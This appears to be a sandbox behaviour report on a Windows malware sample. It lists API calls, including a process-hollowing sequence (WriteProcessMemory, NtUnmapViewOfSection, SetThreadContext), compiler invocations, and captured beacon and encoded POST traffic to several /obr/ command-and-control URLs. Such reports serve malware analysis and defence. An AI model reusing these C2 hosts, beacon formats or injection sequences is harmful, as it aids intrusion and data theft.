mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
kernel32.dll.FindResourceA
kernel32.dll.SizeofResource
kernel32.dll.LoadResource
kernel32.dll.LockResource
gdiplus.dll.GdiplusStartup
kernel32.dll.IsProcessorFeaturePresent
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
gdiplus.dll.GdipCreateBitmapFromStream
windowscodecs.dll.DllGetClassObject
kernel32.dll.WerRegisterMemoryBlock
gdiplus.dll.GdipImageForceValidation
gdiplus.dll.GdipGetImageRawFormat
gdiplus.dll.GdipGetImageWidth
gdiplus.dll.GdipGetImageHeight
gdiplus.dll.GdipBitmapGetPixel
shell32.dll.SHGetFolderPathW
kernel32.dll.CompareStringOrdinal
clr.dll.CreateAssemblyNameObject
ole32.dll.CoGetObjectContext
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
ole32.dll.NdrOleInitializeExtension
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoCreateInstance
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
clr.dll.CreateAssemblyEnum
kernel32.dll.ResolveLocaleName
kernel32.dll.LoadLibraryA
kernel32.dll.WideCharToMultiByte
kernel32.dll.GetProcAddress
kernel32.dll.GetModuleHandleA
advapi32.dll.LookupPrivilegeValueW
advapi32.dll.AdjustTokenPrivileges
ntdll.dll.NtQuerySystemInformation
kernel32.dll.CreateProcessA
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.ReadProcessMemory
kernel32.dll.WriteProcessMemory
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.VirtualAllocEx
kernel32.dll.ResumeThread
ole32.dll.CoUninitialize
oleaut32.dll.#500
advapi32.dll.EventUnregister
gdiplus.dll.GdipDisposeImage
cryptsp.dll.CryptReleaseContext
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
kernel32.dll.QueryActCtxW
kernel32.dll.GetProcessPreferredUILanguages
kernel32.dll.GetUserDefaultUILanguage
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
version.dll.VerQueryValueA
alink.dll.CreateALink
mscoree.dll.CLRCreateInstance
mscoreei.dll.CLRCreateInstance
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
clr.dll.DllGetClassObjectInternal
clr.dll.StrongNameTokenFromPublicKey
clr.dll.StrongNameFreeBuffer
clr.dll.CompareAssemblyIdentityWithConfig
clr.dll.CreateAssemblyConfigCookie
clr.dll.DestroyAssemblyConfigCookie
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptDestroyKey
mscorpehost.dll.InitializeSxS
mscorpehost.dll.CreateICeeFileGen
mscorpehost.dll.DestroyICeeFileGen
ole32.dll.CoCreateGuid
diasymreader.dll.DllGetClassObject
rpcrt4.dll.UuidCreate
kernel32.dll.NlsGetCacheUpdateCount
ole32.dll.CreateStreamOnHGlobal
mscoree.dll.CorExitProcess
mscoreei.dll.CorExitProcess

Execute Commands

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.cmdline"
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Seven01\AppData\Local\Temp\RESA8D2.tmp" "c:\Users\Seven01\AppData\Local\Temp\CSC3512F922DB724C4A9685D61DB0536B18.TMP"

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven03b_64 Seven03b_64 VirtualBox 2018-04-27 09:24:08 2018-04-27 09:26:58 170

17 HTTP Request(s) detected

http://www.eveloo.com/obr/?mN642=ZECmq3xUvO7xEPzXGBxRLb9gpoYIkABtz/LUE/NPC0ircgPb8/mA1k9p2pLGcHqgClwsTb5S&8p=ChrLW8nPhHRpT
  • Hostname: www.eveloo.com
  • IP Address: 122.10.96.61
  • Port: 80
  • Count: 1

GET /obr/?mN642=ZECmq3xUvO7xEPzXGBxRLb9gpoYIkABtz/LUE/NPC0ircgPb8/mA1k9p2pLGcHqgClwsTb5S&8p=ChrLW8nPhHRpT HTTP/1.1
Host: www.eveloo.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.theskinnyindiantakeaway.com/obr/?mN642=qXga2tXBYVp9fznW1W5s6NvNdjSpyFLJHFwgezWq9EYIXISBzwQVphI+z3qIy1ri6+Fl/Ia8&8p=ChrLW8nPhHRpT
  • Hostname: www.theskinnyindiantakeaway.com
  • IP Address: 74.117.221.22
  • Port: 80
  • Count: 1

GET /obr/?mN642=qXga2tXBYVp9fznW1W5s6NvNdjSpyFLJHFwgezWq9EYIXISBzwQVphI+z3qIy1ri6+Fl/Ia8&8p=ChrLW8nPhHRpT HTTP/1.1
Host: www.theskinnyindiantakeaway.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.theskinnyindiantakeaway.com/obr/
  • Hostname: www.theskinnyindiantakeaway.com
  • IP Address: 74.117.221.22
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.theskinnyindiantakeaway.com
Connection: close
Content-Length: 2199
Cache-Control: no-cache
Origin: http://www.theskinnyindiantakeaway.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.theskinnyindiantakeaway.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

mN642=i1sgoNucJXtVLUin2B93gLXdXAzlyxXODCJxXwvv4FIIHq7E8hYZ5nZtqS3nvVH-k-Z81Mv4le4Laf01t3Jwv9W3hl6etrEKqD55Fz2tIF9m8lDO8GiJgqZp2p1lLErTIK~5YMryKfstb-4oATKKFhT0XQNhf0XW8Ra9234qjGWI2WwmbUcYuKyn8FmzRvV3IOgO8PbtLdcqvE9fW05a6z4EVn2Y3uYc6LmRGU(lmzXMassP9E2ffdU83E6X3LFlmmlnd1grZrDkGpcyea5qZ4aX994GSwpPaw0yZmSJszUCDJ7LR4F1T3n9ndIupj2eKuPwd_6ZVTTsT2QBI83SUphShJHUCktzQTfE1Q7quesMAOfjkZkpbwxLJ4DJPGs66FdstjpoZfFrX8USpq(UWrgO3UPxQ6G3GVnV(XrykTa6i5IJKkqheEsKS8PanSLmtmEUE_pI54ucDv3grKc8UErucS1v6yEjpsQK~53zVn5r2xC5b1oxonLSLVENqL6gS-AVu9N-TClQ1K7oABYDsNgOXAZZ4YMf28O_Wueuf8~2oZiwc-HUj8KWkRee8yCm9wb3pZqY9aBYQ_FD1eq61uxEL_(DFsPqJNBuxrTeoVqigENHTTx7~FCgh3blpBlHa9D1v4sBut0r4uwgS0fjjmmwwan5n1Ez~0GBRGheDUjSPXXB5lH8E2SM047hdEGhaGUrEo8eRGct5wplKN4iVhyKod~AKrUHiN6H8TjPLgKaj7qfBskDqRFHLsjzOjml0sNmHZtuAPCqBc~kaGoTBsn3V4GS2YhonT1urkvRs9QwP7MGvE1yibo9NUwaUaga0yJu2qlejj6OKv4fzm6_s4DhUQWayYB2HlfR23nLHtI_ir6TIie-C-GNWJ7U61qmpURY(50dbyvas1okXvUxdSbk5UXRRbjgzi8zjaI3FlTtcu70p_xXPGdIqXqurvNrTvxJ4ofHLSUAoTZF~gEWE9dLjFCCCNhsP-FksWsF3nAwpLjxJgqsY_5saHYl9RVmGaw5FWn3yT3ulp8LGKOasOjw0bMkmv91VZpDTlLde_RRrvdfFB4lFwKmsMRXyiv5GW(EL0rsxElnbTmdgz8ySdrJa2nLTFqGX6hQ~i4odx3hSRZkG4Za18nttyVp3chdeqeYBYNmN43HToli65GBXjCm26vVVOFDACPCFloJjyrSerXLdsFNSfvPD-UFkydp9EZhUB1PLamc8p29t_1jOAMPBbYuGxWw6DDS0A996NuEkCaCxiBfQT41RvqS3sR3jbETIkz9HM6i52~vAZeu7Oje3tArk-4xIB8esXn3UDSxsvX-(o39cbIheyq95suLjWfA5AOMPRZr9TTipzESfNPwwbdX~2J1EG13ZHdUruMWaipI4gABGLKX78nWRW3z~WFdxG6v6BSnFSP-QtV9Q-NtI2g6COFjpPmIjcLZjoxLZY9v5S2xaaj03GGYFb~QsjhEb35_fFihKdM0ZThL9oqAmKsxP_h68bDq76klWhJ5USy7vk7DSlc385Xm(2V5dftxWB1WvskTNN2KRqdPjl006QkdR6wI9kHd26U-z3ejepNT6nNLMO0dJbMMbyLOEB6qxeNvrsafAC4ldg6SU82-cRp0UWjoo3Cz0ol93BLJfupzltorTTunSENsFAfVo-lR2gmq9BkcbH1TjvffG0i0k4AFopW0e3(omdsL6yZNne3bNsxysk6QxeE-O52E69SdW61A3w5fG2Y1Pj8wTFMma9DfWcTAyMrOaa58YRip7BRX74ypcAypYZHbpbUhOcV5heb7ZpYTTR7Wj7lpfv~QGLZb1G~TPc5-exVnPLXOY0glGTK5vB3Fg-luv_xmvTAHvw7c~Dy_(zne2F~FMulf7BDqFxXSGDGrw3OQLpxZWPPS82U9c9j81RDgkeKyHMqbul3yXuDVnWzuAvMZblo4SMP7NlgH~nwutdGVgpJ8dVSZ8SUy(LiEKav7hxMg8GIX5z(NfGbFlsFYECMfnz6SMXP0Gun7eTFS6046SNkLYIg04lhX(52fnohWshY27dMiqkzsuwwHZXks4p5rhh8r8Et9Sg3e8Bet1Ajw26V2kHsv8WPbTMvX7c1Ie_DXJibL~xqXE1OZhWahbw44Md9A1Ud5sHUE~Dh9o26XtoS16sk_oEsaPJjV6gtBbd~qtl7MfsCpfnRe\x00\x00\x00\x00\x00\x00\x00\x00

http://www.theskinnyindiantakeaway.com/obr/
  • Hostname: www.theskinnyindiantakeaway.com
  • IP Address: 74.117.221.22
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.theskinnyindiantakeaway.com
Connection: close
Content-Length: 62439
Cache-Control: no-cache
Origin: http://www.theskinnyindiantakeaway.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.theskinnyindiantakeaway.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

mN642=i1sgoJ6uMnoLB2bXyAsy6YfgcQ38xm7bcBxHXx~m0nhPQ6LE~nMC0nZu7C3mrVKB78JK1I3SlewMRek04FwqnIOHjhba89AFqmpfAyOtGUZgjnrJ63uNpuxrkMxuCSqHKvG9JNnacuUYU6sMAxq4bBH3c3lneVbovjz41zUAqmS8zFVZbWwLjqCOzi7NScMMFvkO6_S2D_kkgjIYSnBz8DIhSiSGqO4G9J(cYFLeg3LQQfk7~kCWWocBjS7T36p8lkxRCkMAb5PwJcogSYViZIK50cwGYAIGdyM6XmTvqzMGY57jR-ZtRAOTo9JrkBDCPInSHPKJUiDsTQ9bZqjBbJhdo9iMHXJ4QTPQnwDqvcIMT67smZkpUQxzJ4DRPGsD6H9w3jhofaZlVPsmr8W-argSwQbnaePqGWX36Dbyng27nckVCQ~iVlJRBcHKnSPzqn0mDeVj44ufM7W69-AgTVb9DERc1igapM0_~Zf_UgZF9RXMJ2Y19W71PVoV3KGLTelqoYtGHyQR18fYDk8fltcYYjca9dF9yJqeQuCyNe2qt5~rUoOWzZuHwTSY5WGnoxPwx5SZ6aN9XOIk17KQkIlwC_jyJJi_Sc5S1N7_(TzC6GdfOTdI6nLfq0iY~wR4X9TvyugypNUS2dACa1rTtF~6xK6urUsWwweqAV02JXOqHiuctF6dBRum2qz1agCVblk-R6sTTXoU7EpZUul0TTjiqNuYKZ9piLi18DXPKkyapcGcBNkA9xFBVcisTW~X0uNiAZpuEIGsCfHpNl00Fsn_X6uJyZBZnQY5qnrB7OAzY_YCjk00j-osPUsDJPow0ic156oBlgDQO-4G33u4~M3HWwaI9LUcAUzLpwblMJUrmI2pKnKmPZCYdoiQsnHu6XFE0IQkTXjvknQaZudkVynP1zjeQJrM3S0Kh6lWM3H_WM(oovdxF09FqmScrOBeRd0Zt5aMHCQlpSF5pBQvBslBjlHRfcJfGoJUplsO7UARqpiqWVSPWdJwIRA161ZgTcNMKByH0AKOpZF4foDF7MzQzLIvhupZQr54Ry3Cds9gvcxVbl4BAXP1ve81pweiZU3BCmLlilMXWBaPs3oWUav4YHeXXGyMX4Vm(DsofB(hTGlkctgu7tbZtABVr8VMOYaaH71Dd-zaEctJw4~-Ayzx8ojcetpoDxvKDWZ1j03SeIj0NfAdRaXmL6YZkj9YviJ1BBh2Re286uaexpFcByshSJtlHhm52CihxFhy64f_(izGwk9ofD8nd92u1sFQtpNKC3v8I_z1(GbkEqCmyLPCvc5ro8U5NwFWiSjEQgDY0dzZ45nRVcoAO0amz-Cv0Gz3wh6KbVQHlTX2hS91TO6KyoJj8gRPTHA1YmkMmc4eBBVlljtzGuuK~oSPTHqptScr116W3ieJLCDkSJpSbv11L1UiKKBywf6wmILLwP0FcPBm7BWTZajl4WfBOZeQsnNAE3FqQWWvEoxIeRB27qqFso0VI7Bg07nh(fkNFHNLeRrYzki8UhYetNux7Hh6YbFPbSF99rxGMpOKSZUtmndf4x9GULAq0BbBz74hz1KkfJ1IuH5ICOg6LbtrdSn7BBiu~PUSkdShCxAlQ0aeeeOiSzs7VR~jzF2kxexD2xmOZ8tv0dJGPwitXlV8IFCRs-RxtBaEjj4IeRBq9_SEO1zVooAP7abWfHCnmcl94ipKnfPYYJl9tSWe3bZCN6~M~ejIa6VE~joBIgcINjtkMUJFf7LtX9jmzr6xS5cIZgzsoCw23rKaQT24YoPG5twlGNUNle6LUKExJmDXi5d-VLebH_EH3kShMcwtU2JZEp~YO3AbFWy8lxrDvMY07_d5mxAPq3ff8wm_1w(n1lzCGtlJ4Bf_YwW6RCaV4x~jKIwDT-3f838NEdiB20OR9sSTS927pkTMPvOBgXDwN_UZQntTW5baImg83Ew59tflgOZHbQeb2Bga5bGRLuSrmzZS0lkUkFGOSFPAjItKFGQo8iDccGCpGrTobQx7~E0_MvkYb-Eu50ty(aLkwIJckQEk(c4Pq3vcpxUyX31P9I9qmxUE(XllAQXM8gCN(mel(5BVinYhy0(bZOz4sfhdZsDfOTq7zlqkOxmW3EXMVjcPItJL63dfklAY0RErpT~MoIy46L45vnYfboiz13dyXojogjjBGoecezxSQWL4O8Mnpm96UVY7l4NO7Hnlr3sFWFlOQ1GSaZjTzBw0BIpZgRoXi9iufMYy5k939DIWthq3uYI-4IZDjKGZgOafx98oHDYASVqPZXcslbA_hn4oWtBmPhyBHLfohvnBVISWh9~u8jkatFBFY0uVIvneLxHBdZf_rhJhpM5dNEwMowbLRpCc

http://www.jmtye.com/obr/?mN642=mXpWvACOgZm3XFbrEzYLDAgqrehK4nHdUDlEvqcvVrNIHmv7DfNuoDBU7OG1FxuvrTbsSYs2&8p=ChrLW8nPhHRpT
  • Hostname: www.jmtye.com
  • IP Address: 192.64.114.9
  • Port: 80
  • Count: 1

GET /obr/?mN642=mXpWvACOgZm3XFbrEzYLDAgqrehK4nHdUDlEvqcvVrNIHmv7DfNuoDBU7OG1FxuvrTbsSYs2&8p=ChrLW8nPhHRpT HTTP/1.1
Host: www.jmtye.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.jmtye.com/obr/
  • Hostname: www.jmtye.com
  • IP Address: 192.64.114.9
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.jmtye.com
Connection: close
Content-Length: 2199
Cache-Control: no-cache
Origin: http://www.jmtye.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.jmtye.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

mN642=u1lsxgrT0o6PXDSdIEsXclAKuulhzFDlPkgIwvwSaflSO039LaQi2npZgLG1Vgez~wnUUexvKj6mOsQEveKMyyEwaoLz6qSlalIW32EfN9JPNS~K9XOdG0Kq41g2SfeC9VfyMKY7(hjK(QRvA4XqDCvwICROnnud1m46J2D-py6gqhtoRRMhqBYHOFR8f83xFsIBaGaAXEJ5esWxVC17kUtRcMJpIfNcsKC3W9cKJRabDAUf32mQzzPGRlD75UoOruvD9an3PMP-WzuXqTKzbGBF9QwIRSTmqnx1Cgu5BCIdKeCwrJHc2xq58-6hMB0wQ7G9QEmg1dYkxi6LFdE4N99LoOQQ(t9K89cZQAQfmOFIIhnmwhGAsqeQsCcRsXRgFyft42a8LVhzPZBckb9tkwm2jPBdKvhdv2rJ5M8v0e~yxKGxyllQz1SFcuMkG-WbkQubiwdIxhZlFU04dtLKWXwAgA5qhpOe(PmH3WA63KvBdUFWFlHqXCBiFmbS0QNQ1_dSLicqo7r8H4R-j85uYff-UlCFlaEBum1tWuf4yAhyN2w925OtLx74~iHPFr(_yVwKBmJqEka9ul59fWFadeKGAzoBnxzh4ySpYBomsdEAzqqufxq22dXnAUgFu5AP(uf9onL56aIyHzJ6d6vl4jwhvduvHfKEVONRhdYkj31L7fAZS8XvDQyfq2sUJrkp8OpKB27UciaDSNdo5ofN98v9maWVnxuAbQ(s~Zb9fO1yz9kVaYj9tItgxxCf9ktF3CJzD51ozda5gOW-s5Uq6IUc0GUhV_5XIItQs2oaVBjTTqfrOtqe9bMvhXo-RUyTx3TDMcuBFU(hmejDdiry(tdsiPNv5phU(q338y(HeKJDH2SQVXBFNPVpdRUKtfyoLzXp7Z(9ecySQ3EMZwEBffzk3UWrvIwz1JHmf8ccrwZJ~HIO5Avcfiq_y-Ee4gQWSKlQt5jrvDu77idvHpd4IBtEtybcwYg3N36hxhwXm_k4RRgzw5yNYuxfCx(0HZtojhHunT~po6NcG-S0npPWng71PMo8207pWlkRguR48sfV2C~YfuIiTvs8jZCZk97VcQ12XRgm3AUjqiPWSpTLVfuzPQSWXMskxyVvFQ9z45reZJrvueUdktikrDmePXBZ6Xmy~5iaq-NDUk2z8huwby17SpXnrjHsE0~e~jHR6mMgSvtbHCG_YRTc8HkqiGHnA9dCHSbNqNCZqHTwG_3-t5gC8N64h4YY3YdBIhCV217xEEjXjCCu9O85sAU0ICQfFszgFWbLDTsspPGjpBtsmGMfdBguJWaYfGxT7rNOT9yzpuEgHbCFFt8AtzWJ8ov72rLT9GdHAV~MLpOX1roAkKVC(6Hlt6UslT3UrBOViXRzNivF009wR-elAQ4UYeE-RC4q4mDgehOaNtv7qf2MVwKM(lPuFwk4PaNw7PPk~Ey0gxrQU8oH5o5zu6(qP9CveGvIN8Uh1kwqAMNklKKYxA(_8nFcZKw-l4(0hsFd1tn0LE3fxrubOB2MyeXjI5xtal3qQjUO4X7gQt(2(rcvnc1tXoqZ9GinXwGjhHC95w87UhZr1lv4v98wRdfvJvmg3g~20YUpvY7xnC(zOCkjFApZOCcOt8as6ob5A0PJbplfOxdh6W7xlBlIRpxWBD9HkFjSrb(QzPxjTD7Qwy~ZtwdaNW5jMIOfqhd4Raim(iYqzZbUAjXIU0gU6QcrMB1CbduOlkOmhGJrrXMBC7kt1Rr-qjWkYJI0x-wNYWtw578maEcToMf1HCOEiyie4ofyC5TI~5YTsiUhrI4L7IkuCZNTJOGMioeTWxgpYiAmqz6WcPL1KGZWH7UIGHNN93QQlFPlSjqwp38mUJ5N2kCHas4TKl4gLN7w3930TaKNi30W7urwb4X_YiLqnO~yZV3V691deiCI~slqCf5p(gv8W5WlX99JVDPG6Le8evvdXfwwfb69C7~ymLdc(K8WxtYdkB(iINBkqdK03hpo2PdaCQ3JDk2hRtn17WJDDQ9ksthOUUJHbrfuvPc8fNgpVow5xCb6JvppakwdqYSlSh0kO3j4~R2i~uGcKfSsPIAZDVyJFPVCQj9Ov1q2mYnOjeVZ8pPE8YHYB6VOIEb24u1eelqWG3tGUZyP7mOTuehrZudnMjXRzEfhn-G-hGybE2Lv6dz-Xj(LMHDp\x00A1Ud5sH

http://www.jmtye.com/obr/
  • Hostname: www.jmtye.com
  • IP Address: 192.64.114.9
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.jmtye.com
Connection: close
Content-Length: 62439
Cache-Control: no-cache
Origin: http://www.jmtye.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.jmtye.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

mN642=u1lsxlfhxY~FAVHnMF9IB2o7pvRr0nSXCTcuwvgWS65AKUH9C4Iv~npY1bG2HQTM8njMUf0yKjihFuoB~r~h6CIIYumw~oq6aG1J9UkfTd9BSwWd7jenZEWogAczHf~z8wntLIAXtQbVjhRHBdLueiLzAhtMnGj62n5_GW7t3Amu4hMVRQIPkiB6FmgKTuDLBroBXVLFdmBnC830Y1oLxUx8Z4FuGrBGvIq8LI98PQCfaiM3zWib6DfvbHju5EFOos7Lzb7iN7PqdCOvpwGFb2wqlDQIIzz_tlp9BAvvDCArfOCMrIXiwWaTze6rCiAjSfqlaguwnI8kwE~YDfs7Cd9Ih-hQ06FB88w3RwYfnNhIMAbljxGAlKeSsCcZsXRdFw(5(2S8bl1LOq5sjIge6Ami3uAKb7Qwv1bn4tAvwuSxkfi16RJTrnPaXOFjG-aSnR(KpxgOyhZmRXQrO_iLbiVa(W4SgZKw(viI30A20JbVIkRoAXrcUywKBm2B6CJrkvJkMApdsJLmHut3gd85bcKacDXG1L0-(nM_X_a54jZuJW8mm7KPdFfT2xreXav-3jkNYjJvDkXlpUkPRV50LYWyAQcO4F(DzwSZOS4X9MZWnoLzAQ2V0_eYVChw(olH3s223VzK3dcXLFdIV76yyAZevNCdL7G1I79ywPM7nU523u0_fMqOEwS1rFEyZf4RxOR1K1bTbzfoTc4bnP2r6LiE46HakD3UbQ345ov9eK1y3-MUd5j2j4sl9hCbg0pn3HdvRoBon9q3x5CwmJgr3oUEyEwiR_YnIKhMt2VtESjQWuCDJtqZvKwUnXUnPnq5kXWeGO6RHRLxtpDCZDP5o88kwoF9iodzrbK9yiPtRol5J1~qXTFzDs83UwdIpOGHHhfL~JbIW-6NEUNZdhdkX-Pfrk20h6UT~Z(MfcwyyytXpSBX6wzEOAa4zLAw4EJPafsAkYHD3jrl4n5TQ-1dE0gUsSX2yZ4uCnbg9zAQgooRBAYhy4vjGZ4wEXePB4Fur2vevEKKkNdPB8yms7D6mWP4N8le6RbRY3F37-JN67mn7UGOa6UKfswelKu0wMjFQBo8Dzw72ikWmzajbonzEoDfBiTITNtrx2YDFyBz1qLeD5Lvrchh78vjr0OiGnduqB~w5rKZ68laQmTvgBWEMk0aWYjUiAr1Jk2g3x2t6l8gSJg8Dj6CZUjx6Uk241P8EP5WMD(gyImDsA~LIcrB1c8wvMXenrwrrKZhJjrt2kHHHgfCiEWJ0eonlUZNKBtdJu7IOGfGXy91hcKluzxe9SA5WHc7UEWAVXJem4dtXaGbgNhyAOnGNu4tuC2My7Dl85P0mSVBOHD1Bp7A(KRdoMNnyqrB3IA882mGrjvTkGN7BwTS8AEMRfX3QxY-DNR-TD8Ez1DBXB7dSsbhq_uZNwWU6nbIRkB4A6Av9fyA8XCSxzvZYPI54o4tgqn-E_iveGnMXMQO0TggBZ5RiMW53BnipRZ0eLs0~ob_suxD0P3ac126uLnkCRHU49SCPNJifkSPDkATqwOJfer24YUOgdlgFbrCzTrrcVS_qnil52slXCIsr17_j9oXCIrBMPKz9Gm55JMR39ffoQHzWD4_PhlNBQI-s9ao96vIEFKcbZoePnc681iU4l1SVIoIQ14szUy7sKDq1uJVXRTL6yDdixN0eW40f4q-qRYnRfODsBQtzY(XYmrNUlYS8RM4NHBgMfeykA6ipTUrxk08KYs0qwfOtgy8boYKwfspR04G4Kt5Q3M90P3kJTjytjaIx7(IJu7x0dMEqhIHwfYG6KM5M5hePbyNkNngXwYNRlUQiRjAQZPhaSRXQ7JDLGUR2n1e8F2qVkGzrGAmeMtWyEHKL9hQHF0fVs6BwIWBU675jVNE9br5b4PLBCL9msOMBjbkuuxDTDm2xYVbP8Rvywn8NveTAv8rFQDlzr24Xr7-QMM9OJK_X4bu0Ihz(7F0n5ZvslbnU-NAvNmx(h963PhTbi3xFGSZRv3mlF8jSwx9ytpdZD5dZ_eKvsg-WegVbZcv1GfLI81JXFkek5ifDRQnZQfX~GbH0OmCb-OuN6hONWGiaPZ1YGBO5kOjxY7b4fcU2-vJ(sPrNPkAf2WR2_dyR227bEdgSaaTzynbt8ZkP5gnNE7bk17p7dLqsDG4JzHO7N6GV17bJhyfMznOdQMwXLnrblt1pZO52wNgIG~xYSk_obvJWU5ZyQf9pMUuBKng~ZC2Z1w-tyWLoT4H1w5lxJVs5Lk5bhF8VB3PR4(bHm5VotbwW9J0eAUlWX0DREElNWbSN3AdomDbft7g3Jn-Jl7FQm89~cxjgpxXI58yR0mNHE9WwM8cQX1lRrzo(W41gLRH65gAbo4wgVY1fyN1yQwf7-NsqHnpbgOz4tNxgrFNLZFSfmsBW-

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
  • Hostname: www.download.windowsupdate.com
  • IP Address: 67.26.137.254
  • Port: 80
  • Count: 1

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86400
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

http://www.salientchurch.com/obr/?mN642=g43ZCh1FQfYzGmeWU42x29Ngc8XWEbiavyzG19r4icRZx0t+3L2ivfuuL396VRD1GxEIybsN&8p=ChrLW8nPhHRpT
  • Hostname: www.salientchurch.com
  • IP Address: 208.91.197.194
  • Port: 80
  • Count: 1

GET /obr/?mN642=g43ZCh1FQfYzGmeWU42x29Ngc8XWEbiavyzG19r4icRZx0t+3L2ivfuuL396VRD1GxEIybsN&8p=ChrLW8nPhHRpT HTTP/1.1
Host: www.salientchurch.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.salientchurch.com/obr/
  • Hostname: www.salientchurch.com
  • IP Address: 208.91.197.194
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.salientchurch.com
Connection: close
Content-Length: 2199
Cache-Control: no-cache
Origin: http://www.salientchurch.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.salientchurch.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

mN642=oa7jcF4_C9YhfjqsVvLWoaJjLf3XMvieqy~vofv9mtFPxFB9kd~vwaTnMQBFBRDAWzA21vJ6w8lMdWGY2aEblB22uEwmdEc4NB3Ia2S1x_UQFMfHi77ByQ9_bhRyhF~j(9p5kxYyw0iVi-cwHmtFgGY-RsvlGuoqSCCHdNrSIfBifF4L5J7pms~O(9HHHP32f467SKnRZ1SPtvekvXeeAYmHIFoxO2rfxCtOIemBEwsG713u2Jlh6e2-JMRbwiImJbY1B8vue6MWwmSWYvl7LChdz8~53okbX34TAFUYosoVzzjUXSxfNB6HMJu-HeAS8lsHhe550qmhrcdt7ioMMK8DV7vyKhGdD8PKvT5JUPFRci(JZl1Iw60c9eKTQynybF(XeyUtnVOKjifytVu1RqznxfB6tfTykyp_(bLtFjwhAOBwrjMu5hszd2ka(S36auTtKs9ZcHojPzYcYtwLxPx2XZFFUOv1TAB2QQ~2p_5ESuBkHrTI2K7aYm0QF-SfmHBBZcQXc6vf9wUBA4b7uGbsEGZmDFb2wbk511hSz2X_(Df6FnOqvtMWcXBQWq0Bmk5Lhx1ii4sVzM(6OxhVySjjz1ufyas9e9UftlC7ubiivDrVMB8Zc6ZeSqUvxTKwzLGGN2pYAedZNmZP6eGy4qyzBnPXmN1A2r7UoTbB6SYfJkYLLLjUWfztPAYArS7AW36gKwGsn8Vo~5yEaV(WPcp3ASJmMDVpccCmfNZ13lNFTfauRfVznauP6iZdK-rK~xMhxdAfijjhWDflwgTUSDgvFFEBSm0KI5H